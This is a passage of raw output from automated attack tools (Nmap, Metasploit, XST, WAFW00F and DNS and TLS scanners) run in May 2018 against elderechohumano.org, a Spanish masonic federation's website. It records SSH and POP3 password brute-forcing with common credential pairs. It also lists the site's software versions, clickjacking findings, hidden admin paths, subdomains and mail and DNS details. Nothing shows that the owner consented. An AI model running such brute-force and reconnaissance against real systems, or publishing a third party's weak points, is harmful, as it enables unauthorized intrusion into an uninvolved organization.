  1232. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  1233. NSE: [ssh-brute] Trying username/password pair: user:ashley
  1234. NSE: [ssh-brute] Trying username/password pair: web:ashley
  1235. NSE: [ssh-brute] Trying username/password pair: test:ashley
  1236. NSE: [ssh-brute] Trying username/password pair: root:000000
  1237. NSE: [ssh-brute] Trying username/password pair: admin:000000
  1238. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  1239. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  1240. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  1241. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  1242. NSE: [ssh-brute] Trying username/password pair: guest:000000
  1243. NSE: [ssh-brute] Trying username/password pair: user:000000
  1244. NSE: [ssh-brute] Trying username/password pair: web:000000
  1245. NSE: [ssh-brute] Trying username/password pair: test:000000
  1246. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  1247. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  1248. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  1249. Nmap scan report for elderechohumano.org (51.255.33.229)
  1250. Host is up (0.43s latency).
  1251. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  1252.  
  1253. PORT STATE SERVICE VERSION
  1254. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
  1255. | ssh-auth-methods:
  1256. | Supported authentication methods:
  1257. | publickey
  1258. |_ password
  1259. | ssh-brute:
  1260. | Accounts: No valid accounts found
  1261. |_ Statistics: Performed 233 guesses in 181 seconds, average tps: 1.5
  1262. | ssh-hostkey:
  1263. | 1024 28:53:f6:e0:cd:8d:b0:ba:bf:c5:3f:ed:97:ff:c7:52 (DSA)
  1264. | 2048 4f:c7:a5:bc:88:8a:ab:28:35:a1:c2:07:24:51:48:e5 (RSA)
  1265. |_ 256 48:0a:9c:f0:85:b3:8b:ae:37:21:26:d5:d4:f6:5c:c6 (ECDSA)
  1266. | ssh-publickey-acceptance:
  1267. |_ Accepted Public Keys: No public keys accepted
  1268. |_ssh-run: Failed to specify credentials and command to run.
  1269. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1270. Device type: WAP|general purpose
  1271. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
  1272. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
  1273. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
  1274. No exact OS matches for host (test conditions non-ideal).
  1275. Network Distance: 1 hop
  1276. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1277.  
  1278. TRACEROUTE (using port 22/tcp)
  1279. HOP RTT ADDRESS
  1280. 1 474.72 ms 229.ip-51-255-33.eu (51.255.33.229)
  1281.  
  1282. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1283. Nmap done: 1 IP address (1 host up) scanned in 199.28 seconds
  1284.  
  1285. _---------.
  1286. .' ####### ;."
  1287. .---,. ;@ @@`; .---,..
  1288. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
  1289. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
  1290. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
  1291. "--'.@@@ -.@ @ ,'- .'--"
  1292. ".@' ; @ @ `. ;'
  1293. |@@@@ @@@ @ .
  1294. ' @@@ @@ @@ ,
  1295. `.@@@@ @@ .
  1296. ',@@ @ ; _____________
  1297. ( 3 C ) /|___ / Metasploit! \
  1298. ;@'. __*__,." \|--- \_____________/
  1299. '(.,...."/
  1300.  
  1301.  
  1302. =[ metasploit v4.16.57-dev ]
  1303. + -- --=[ 1767 exploits - 1007 auxiliary - 307 post ]
  1304. + -- --=[ 537 payloads - 41 encoders - 10 nops ]
  1305. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1306.  
  1307. USER_FILE => /BruteX/wordlists/simple-users.txt
  1308. RHOSTS => elderechohumano.org
  1309. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  1310. RHOST => elderechohumano.org
  1311. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  1312. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  1313. [+] 51.255.33.229:22 - SSH server version: SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10 ( service.version=6.6.1p1 openssh.comment=Ubuntu-2ubuntu2.10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.version=14.04 service.protocol=ssh fingerprint_db=ssh.banner )
  1314. [*] elderechohumano.org:22 - Scanned 1 of 1 hosts (100% complete)
  1315. [*] Auxiliary module execution completed
  1316. + -- --=[Port 23 closed... skipping.
  1317. + -- --=[Port 25 closed... skipping.
  1318. + -- --=[Port 53 opened... running tests...
  1319. Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:24 EDT
  1320. Nmap scan report for elderechohumano.org (51.255.33.229)
  1321. Host is up (0.42s latency).
  1322. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  1323.  
  1324. PORT STATE SERVICE VERSION
  1325. 53/tcp open domain (unknown banner: none)
  1326. |_dns-fuzz: Server didn't response to our probe, can't fuzz
  1327. | dns-nsec-enum:
  1328. |_ No NSEC records found
  1329. | dns-nsec3-enum:
  1330. |_ DNSSEC NSEC3 not supported
  1331. | dns-nsid:
  1332. |_ bind.version: none
  1333. | fingerprint-strings:
  1334. | DNSVersionBindReqTCP:
  1335. | version
  1336. | bind
  1337. |_ none
  1338. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  1339. SF-Port53-TCP:V=7.70%I=7%D=5/23%Time=5B050922%P=x86_64-pc-linux-gnu%r(DNSV
  1340. SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
  1341. SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\
  1342. SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
  1343. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1344. Device type: WAP|general purpose
  1345. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
  1346. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
  1347. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
  1348. No exact OS matches for host (test conditions non-ideal).
  1349. Network Distance: 1 hop
  1350.  
  1351. Host script results:
  1352. | dns-blacklist:
  1353. | SPAM
  1354. |_ l2.apews.org - SPAM
  1355. | dns-brute:
  1356. | DNS Brute-force hostnames:
  1357. | ns.elderechohumano.org - 51.255.33.229
  1358. | mail.elderechohumano.org - 51.255.33.229
  1359. | www.elderechohumano.org - 51.255.33.229
  1360. | ftp.elderechohumano.org - 51.255.33.229
  1361. |_ smtp.elderechohumano.org - 51.255.33.229
  1362.  
  1363. TRACEROUTE (using port 53/tcp)
  1364. HOP RTT ADDRESS
  1365. 1 472.37 ms 229.ip-51-255-33.eu (51.255.33.229)
  1366.  
  1367. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1368. Nmap done: 1 IP address (1 host up) scanned in 41.27 seconds
  1369. + -- --=[Port 67 closed... skipping.
  1370. + -- --=[Port 68 closed... skipping.
  1371. + -- --=[Port 69 closed... skipping.
  1372. + -- --=[Port 79 closed... skipping.
  1373. + -- --=[Port 80 opened... running tests...
  1374. #######################################################################################################################################
  1375. http://elderechohumano.org [301 Moved Permanently] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], RedirectLocation[https://elderechohumano.org/], Title[301 Moved Permanently], nginx
  1376. https://elderechohumano.org/ [302 Found] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], Plesk[Lin], RedirectLocation[https://elderechohumano.org/web], Title[302 Found], X-Powered-By[PleskLin], nginx
  1377. https://elderechohumano.org/web [301 Moved Permanently] Country[UNITED KINGDOM][GB], HTTPServer[nginx], IP[51.255.33.229], Plesk[Lin], RedirectLocation[https://elderechohumano.org/web/], Title[301 Moved Permanently], X-Powered-By[PleskLin], nginx
  1378. https://elderechohumano.org/web/ [200 OK] Country[UNITED KINGDOM][GB], HTML5, HTTPServer[nginx], IP[51.255.33.229], JQuery[1.12.4], MetaGenerator[WordPress 4.9.6], Open-Graph-Protocol[website], PHP[5.6.31,], Plesk[Lin], Script[text/javascript], Title[Federación española le droit humain el derecho humano &#8211; Logias españolas de la orden masónica mixta internacional], UncommonHeaders[link], WordPress[4.9.6], X-Powered-By[PHP/5.6.31, PleskLin], nginx, x-pingback[https://elderechohumano.org/web/xmlrpc.php]
  1379.  
  1380. __ ______ _____
  1381. \ \/ / ___|_ _|
  1382. \ /\___ \ | |
  1383. / \ ___) || |
  1384. /_/\_|____/ |_|
  1385.  
  1386. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1387. + -- --=[Target: elderechohumano.org:80
  1388. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1389. + -- --=[Site not vulnerable to Host Header Injection!
  1390. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1391. + -- --=[Site vulnerable to Clickjacking!
  1392.  
  1393. HTTP/1.1 405 Not Allowed
  1394. Server: nginx
  1395. Date: Wed, 23 May 2018 06:25:33 GMT
  1396. Content-Type: text/html
  1397. Content-Length: 166
  1398. Connection: close
  1399.  
  1400. <html>
  1401. <head><title>405 Not Allowed</title></head>
  1402. <body bgcolor="white">
  1403. <center><h1>405 Not Allowed</h1></center>
  1404. <hr><center>nginx</center>
  1405. </body>
  1406. </html>
  1407.  
  1408. HTTP/1.1 301 Moved Permanently
  1409. Server: nginx
  1410. Date: Wed, 23 May 2018 06:25:36 GMT
  1411. Content-Type: text/html
  1412. Content-Length: 178
  1413. Connection: keep-alive
  1414. Location: https://elderechohumano.org/
  1415.  
  1416. <html>
  1417. <head><title>301 Moved Permanently</title></head>
  1418. <body bgcolor="white">
  1419. <center><h1>301 Moved Permanently</h1></center>
  1420. <hr><center>nginx</center>
  1421. </body>
  1422. </html>
  1423. #######################################################################################################################################
  1424. + -- --=[Checking if X-Content options are enabled on elderechohumano.org...
  1425.  
  1426. + -- --=[Checking if X-Frame options are enabled on elderechohumano.org...
  1427.  
  1428. + -- --=[Checking if X-XSS-Protection header is enabled on elderechohumano.org...
  1429.  
  1430. + -- --=[Checking HTTP methods on elderechohumano.org...
  1431.  
  1432. + -- --=[Checking if TRACE method is enabled on elderechohumano.org...
  1433.  
  1434. + -- --=[Checking for META tags on elderechohumano.org...
  1435.  
  1436. + -- --=[Checking for open proxy on elderechohumano.org...
  1437. </div>
  1438.  
  1439. <div id="footer-wrapper">
  1440. <div id="footer">
  1441. This page was generated by <a href="http://www.parallels.com/products/panel/intro">Parallels Plesk</a> <span class="separator">&nbsp;</span> <a class="copyright" href="http://www.parallels.com">&copy; 1999-2014. Parallels IP Holdings GmbH. All rights reserved.</a>
  1442. </div>
  1443. </div>
  1444.  
  1445. </body>
  1446. </html>
  1447.  
  1448. + -- --=[Enumerating software on elderechohumano.org...
  1449. Server: nginx
  1450.  
  1451. + -- --=[Checking if Strict-Transport-Security is enabled on elderechohumano.org...
  1452.  
  1453. + -- --=[Checking for Flash cross-domain policy on elderechohumano.org...
  1454. <html>
  1455. <head><title>301 Moved Permanently</title></head>
  1456. <body bgcolor="white">
  1457. <center><h1>301 Moved Permanently</h1></center>
  1458. <hr><center>nginx</center>
  1459. </body>
  1460. </html>
  1461.  
  1462. + -- --=[Checking for Silverlight cross-domain policy on elderechohumano.org...
  1463. <html>
  1464. <head><title>301 Moved Permanently</title></head>
  1465. <body bgcolor="white">
  1466. <center><h1>301 Moved Permanently</h1></center>
  1467. <hr><center>nginx</center>
  1468. </body>
  1469. </html>
  1470.  
  1471. + -- --=[Checking for HTML5 cross-origin resource sharing on elderechohumano.org...
  1472.  
  1473. + -- --=[Retrieving robots.txt on elderechohumano.org...
  1474. <html>
  1475. <head><title>301 Moved Permanently</title></head>
  1476. <body bgcolor="white">
  1477. <center><h1>301 Moved Permanently</h1></center>
  1478. <hr><center>nginx</center>
  1479. </body>
  1480. </html>
  1481.  
  1482. + -- --=[Retrieving sitemap.xml on elderechohumano.org...
  1483. <html>
  1484. <head><title>301 Moved Permanently</title></head>
  1485. <body bgcolor="white">
  1486. <center><h1>301 Moved Permanently</h1></center>
  1487. <hr><center>nginx</center>
  1488. </body>
  1489. </html>
  1490.  
  1491. + -- --=[Checking cookie attributes on elderechohumano.org...
  1492.  
  1493. + -- --=[Checking for ASP.NET Detailed Errors on elderechohumano.org...
  1494. <BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
  1495. - an error's message is "too small", specifically
  1496. - its own error message. You can turn that off,
  1497. - "smart error messages". That means, of course,
  1498. - that short error messages are censored by default.
  1499. - IIS always returns error messages that are long
  1500. - workaround is pretty simple: pad the error
  1501. #######################################################################################################################################
  1502. ---------------------------------------------------------------------------------------------------------------------------------------
  1503.  
  1504. [ ! ] Starting SCANNER INURLBR 2.1 at [23-05-2018 02:27:00]
  1505. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1506. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1507. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1508.  
  1509. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-elderechohumano.org.txt ]
  1510. [ INFO ][ DORK ]::[ site:elderechohumano.org ]
  1511. [ INFO ][ SEARCHING ]:: {
  1512. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ug ]
  1513.  
  1514. [ INFO ][ SEARCHING ]::
  1515. -[:::]
  1516. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1517.  
  1518. [ INFO ][ SEARCHING ]::
  1519. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1520. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 002901626849897788481:cpnctza84gq ]
  1521.  
  1522. [ INFO ][ SEARCHING ]::
  1523. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1524.  
  1525. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  1526. [ INFO ] Not a satisfactory result was found!
  1527.  
  1528.  
  1529. [ INFO ] [ Shutting down ]
  1530. [ INFO ] [ End of process INURLBR at [23-05-2018 02:27:20]
  1531. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1532. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-elderechohumano.org.txt ]
  1533. |_________________________________________________________________________________________
  1534.  
  1535. \_________________________________________________________________________________________/
  1536.  
  1537. + -- --=[Port 110 opened... running tests...
  1538. Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-23 02:27 EDT
  1539. Nmap scan report for elderechohumano.org (51.255.33.229)
  1540. Host is up (0.42s latency).
  1541. rDNS record for 51.255.33.229: 229.ip-51-255-33.eu
  1542.  
  1543. PORT STATE SERVICE VERSION
  1544. 110/tcp open pop3 Courier pop3d
  1545. | pop3-brute:
  1546. | Accounts: No valid accounts found
  1547. | Statistics: Performed 28 guesses in 17 seconds, average tps: 1.6
  1548. |_ ERROR: Failed to connect.
  1549. |_pop3-capabilities: PIPELINING TOP APOP UIDL SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256) IMPLEMENTATION(Courier Mail Server) STLS LOGIN-DELAY(10)
  1550. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1551. Device type: WAP|general purpose
  1552. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 3.X|2.6.X (93%)
  1553. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.6
  1554. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 3.2.0 (93%), Linux 2.6.18 - 2.6.22 (93%)
  1555. No exact OS matches for host (test conditions non-ideal).
  1556. Network Distance: 1 hop
  1557. Service Info: Host: localhost.localdomain
  1558.  
  1559. TRACEROUTE (using port 443/tcp)
  1560. HOP RTT ADDRESS
  1561. 1 480.50 ms 229.ip-51-255-33.eu (51.255.33.229)
  1562. #######################################################################################################################################
  1563.  
  1564. ^ ^
  1565. _ __ _ ____ _ __ _ _ ____
  1566. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1567. | V V // o // _/ | V V // 0 // 0 // _/
  1568. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1569. <
  1570. ...'
  1571.  
  1572. WAFW00F - Web Application Firewall Detection Tool
  1573.  
  1574. By Sandro Gauci && Wendel G. Henrique
  1575.  
  1576. Checking https://elderechohumano.org
  1577. Generic Detection results:
  1578. No WAF detected by the generic detection
  1579. Number of requests: 13
  1580. #######################################################################################################################################
  1581. __ ______ _____
  1582. \ \/ / ___|_ _|
  1583. \ /\___ \ | |
  1584. / \ ___) || |
  1585. /_/\_|____/ |_|
  1586.  
  1587. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1588. + -- --=[Target: elderechohumano.org:443
  1589. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1590. + -- --=[Site not vulnerable to Host Header Injection!
  1591. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1592. + -- --=[Site vulnerable to Clickjacking!
  1593.  
  1594. HTTP/1.1 405 Not Allowed
  1595. Server: nginx
  1596. Date: Wed, 23 May 2018 06:28:34 GMT
  1597. Content-Type: text/html
  1598. Content-Length: 166
  1599. Connection: close
  1600.  
  1601. <html>
  1602. <head><title>405 Not Allowed</title></head>
  1603. <body bgcolor="white">
  1604. <center><h1>405 Not Allowed</h1></center>
  1605. <hr><center>nginx</center>
  1606. </body>
  1607. </html>
  1608.  
  1609. HTTP/1.1 400 Bad Request
  1610. Server: nginx
  1611. Date: Wed, 23 May 2018 06:28:37 GMT
  1612. Content-Type: text/html
  1613. Content-Length: 264
  1614. Connection: close
  1615.  
  1616. <html>
  1617. <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
  1618. <body bgcolor="white">
  1619. <center><h1>400 Bad Request</h1></center>
  1620. <center>The plain HTTP request was sent to HTTPS port</center>
  1621. <hr><center>nginx</center>
  1622. </body>
  1623. </html>
  1624. #######################################################################################################################################
  1625. + -- --=[Checking if X-Content options are enabled on elderechohumano.org...
  1626.  
  1627. + -- --=[Checking if X-Frame options are enabled on elderechohumano.org...
  1628.  
  1629. + -- --=[Checking if X-XSS-Protection header is enabled on elderechohumano.org...
  1630.  
  1631. + -- --=[Checking HTTP methods on elderechohumano.org...
  1632.  
  1633. + -- --=[Checking if TRACE method is enabled on elderechohumano.org...
  1634.  
  1635. + -- --=[Checking for META tags on elderechohumano.org...
  1636.  
  1637. + -- --=[Checking for open proxy on elderechohumano.org...
  1638.  
  1639. + -- --=[Enumerating software on elderechohumano.org...
  1640. server: nginx
  1641. x-powered-by: PleskLin
  1642.  
  1643. + -- --=[Checking if Strict-Transport-Security is enabled on elderechohumano.org...
  1644.  
  1645. + -- --=[Checking for Flash cross-domain policy on elderechohumano.org...
  1646. - "smart error messages". That means, of course,
  1647. - that short error messages are censored by default.
  1648. - IIS always returns error messages that are long
  1649. - enough to make Internet Explorer happy. The
  1650. - workaround is pretty simple: pad the error
  1651. - message with a big comment like this to push it
  1652. - over the five hundred and twelve bytes minimum.
  1653. - Of course, that's exactly what you're reading
  1654. - right now.
  1655. -->
  1656.  
  1657. + -- --=[Checking for Silverlight cross-domain policy on elderechohumano.org...
  1658. - "smart error messages". That means, of course,
  1659. - that short error messages are censored by default.
  1660. - IIS always returns error messages that are long
  1661. - enough to make Internet Explorer happy. The
  1662. - workaround is pretty simple: pad the error
  1663. - message with a big comment like this to push it
  1664. - over the five hundred and twelve bytes minimum.
  1665. - Of course, that's exactly what you're reading
  1666. - right now.
  1667. -->
  1668.  
  1669. + -- --=[Checking for HTML5 cross-origin resource sharing on elderechohumano.org...
  1670.  
  1671. + -- --=[Retrieving robots.txt on elderechohumano.org...
  1672. Disallow: /biblioteca/
  1673. Disallow: /admin/
  1674. Disallow: /mail/
  1675. Disallow: /Maes/
  1676. Disallow: /secretaria/
  1677. Disallow: /venerables/
  1678. Disallow: /gestion/
  1679. Allow: /
  1680.  
  1681.  
  1682.  
  1683. + -- --=[Retrieving sitemap.xml on elderechohumano.org...
  1684. <url>
  1685. <loc>http://www.elderechohumano.org/index.php?seccion=82&amp;pagina=1</loc>
  1686. </url>
  1687. <url>
  1688. <loc>http://www.elderechohumano.org/index.php?seccion=82&amp;id=7&amp;accion=detalleNoticia</loc>
  1689. </url>
  1690. <url>
  1691. <loc>http://www.elderechohumano.org/index.php?seccion=82&amp;id=4&amp;accion=detalleNoticia</loc>
  1692. </url>
  1693. </urlset>
  1694. + -- --=[Checking cookie attributes on elderechohumano.org...
  1695.  
  1696. + -- --=[Checking for ASP.NET Detailed Errors on elderechohumano.org...
  1697. <BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
  1698. - an error's message is "too small", specifically
  1699. - its own error message. You can turn that off,
  1700. - "smart error messages". That means, of course,
  1701. - that short error messages are censored by default.
  1702. - IIS always returns error messages that are long
  1703. - workaround is pretty simple: pad the error
  1704. <BASE href="/error_docs/"><!--[if lte IE 6]></BASE><![endif]-->
  1705. - an error's message is "too small", specifically
  1706. - its own error message. You can turn that off,
  1707. - "smart error messages". That means, of course,
  1708. - that short error messages are censored by default.
  1709. - IIS always returns error messages that are long
  1710. - workaround is pretty simple: pad the error
  1711. #######################################################################################################################################
  1712.  
  1713.  
  1714.  
  1715. AVAILABLE PLUGINS
  1716. -----------------
  1717.  
  1718. PluginCertInfo
  1719. PluginSessionRenegotiation
  1720. PluginHeartbleed
  1721. PluginOpenSSLCipherSuites
  1722. PluginCompression
  1723. PluginSessionResumption
  1724. PluginChromeSha1Deprecation
  1725. PluginHSTS
  1726.  
  1727.  
  1728.  
  1729. CHECKING HOST(S) AVAILABILITY
  1730. -----------------------------
  1731.  
  1732. elderechohumano.org:443 => 51.255.33.229:443
  1733.  
  1734.  
  1735.  
  1736. SCAN RESULTS FOR ELDERECHOHUMANO.ORG:443 - 51.255.33.229:443
  1737. ------------------------------------------------------------
  1738.  
  1739. * Deflate Compression:
  1740. OK - Compression disabled
  1741.  
  1742. * Session Renegotiation:
  1743. Client-initiated Renegotiations: OK - Rejected
  1744. Secure Renegotiation: OK - Supported
  1745.  
  1746. * Certificate - Content:
  1747. SHA1 Fingerprint: e5f63766c85b8e75a4db072309cb6b255a8034ff
  1748. Common Name: elderechohumano.org
  1749. Issuer: Let's Encrypt Authority X3
  1750. Serial Number: 03919C2A49B013A9DB157AE36B4919656E40
  1751. Not Before: Apr 23 15:58:13 2018 GMT
  1752. Not After: Jul 22 15:58:13 2018 GMT
  1753. Signature Algorithm: sha256WithRSAEncryption
  1754. Public Key Algorithm: rsaEncryption
  1755. Key Size: 2048 bit
  1756. Exponent: 65537 (0x10001)
  1757. X509v3 Subject Alternative Name: {'DNS': ['elderechohumano.org', 'logiaferreriguardiadh.org.es', 'www.elderechohumano.org', 'www.logiaferreriguardiadh.org.es']}
  1758.  
  1759. * Certificate - Trust:
  1760. Hostname Validation: OK - Subject Alternative Name matches
  1761. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1762. Java 6 CA Store (Update 65): OK - Certificate is trusted
  1763. Microsoft CA Store (09/2015): OK - Certificate is trusted
  1764. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  1765. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  1766. Certificate Chain Received: ['elderechohumano.org', "Let's Encrypt Authority X3"]
  1767.  
  1768. * Certificate - OCSP Stapling:
  1769. NOT SUPPORTED - Server did not send back an OCSP response.
  1770.  
  1771. * SSLV2 Cipher Suites:
  1772. Server rejected all cipher suites.
  1773.  
  1774. * Session Resumption:
  1775. With Session IDs: NOT SUPPORTED (0 successful, 5 failed, 0 errors, 5 total attempts).
  1776. With TLS Session Tickets: OK - Supported
  1777.  
  1778. * SSLV3 Cipher Suites:
  1779. Server rejected all cipher suites.
  1780.  
  1781.  
  1782.  
  1783. SCAN COMPLETED IN 10.38 S
  1784. -------------------------
  1785. Version: 1.11.11-static
  1786. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1787.  
  1788. Connected to 51.255.33.229
  1789.  
  1790. Testing SSL server elderechohumano.org on port 443 using SNI name elderechohumano.org
  1791.  
  1792. TLS Fallback SCSV:
  1793. Server supports TLS Fallback SCSV
  1794.  
  1795. TLS renegotiation:
  1796. Secure session renegotiation supported
  1797.  
  1798. TLS Compression:
  1799. Compression disabled
  1800.  
  1801. Heartbleed:
  1802. TLS 1.2 not vulnerable to heartbleed
  1803. TLS 1.1 not vulnerable to heartbleed
  1804. TLS 1.0 not vulnerable to heartbleed
  1805.  
  1806. Supported Server Cipher(s):
  1807. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1808. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1809. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1810. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1811. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1812. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1813. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1814. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1815. Accepted TLSv1.2 128 bits AES128-SHA256
  1816. Accepted TLSv1.2 256 bits AES256-SHA256
  1817. Accepted TLSv1.2 128 bits AES128-SHA
  1818. Accepted TLSv1.2 256 bits AES256-SHA
  1819. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  1820. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  1821. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1822. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1823. Accepted TLSv1.1 128 bits AES128-SHA
  1824. Accepted TLSv1.1 256 bits AES256-SHA
  1825. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  1826. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  1827. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1828. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1829. Accepted TLSv1.0 128 bits AES128-SHA
  1830. Accepted TLSv1.0 256 bits AES256-SHA
  1831. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  1832. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  1833.  
  1834. SSL Certificate:
  1835. Signature Algorithm: sha256WithRSAEncryption
  1836. RSA Key Strength: 2048
  1837.  
  1838. Subject: elderechohumano.org
  1839. Altnames: DNS:elderechohumano.org, DNS:logiaferreriguardiadh.org.es, DNS:www.elderechohumano.org, DNS:www.logiaferreriguardiadh.org.es
  1840. Issuer: Let's Encrypt Authority X3
  1841.  
  1842. Not valid before: Apr 23 15:58:13 2018 GMT
  1843. Not valid after: Jul 22 15:58:13 2018 GMT
  1844. #######################################################################################################################################
  1845. [*] Performing General Enumeration of Domain: elderechohumano.org
  1846. [-] DNSSEC is not configured for elderechohumano.org
  1847. [*] SOA sdns2.ovh.net 213.251.188.141
  1848. [*] NS vps435959.ovh.net 51.255.33.229
  1849. [*] Bind Version for 51.255.33.229 none
  1850. [*] NS sdns2.ovh.net 213.251.188.141
  1851. [*] Bind Version for 213.251.188.141 [Secured]
  1852. [*] MX mail.elderechohumano.org 51.255.33.229
  1853. [*] A elderechohumano.org 51.255.33.229
  1854. [*] TXT elderechohumano.org v=spf1 +a +mx -all
  1855. [*] TXT _domainkey.elderechohumano.org o=-
  1856. [*] Enumerating SRV Records
  1857. [-] No SRV Records Found for elderechohumano.org
  1858. [+] 0 Records Found
  1859. #######################################################################################################################################
  1860. [*] Processing domain elderechohumano.org
  1861. [+] Getting nameservers
  1862. 213.251.188.141 - sdns2.ovh.net
  1863. 51.255.33.229 - vps435959.ovh.net
  1864. [-] Zone transfer failed
  1865.  
  1866. [+] TXT records found
  1867. "v=spf1 +a +mx -all"
  1868.  
  1869. [+] MX records found, added to target list
  1870. 10 mail.elderechohumano.org.
  1871.  
  1872. [*] Scanning elderechohumano.org for A records
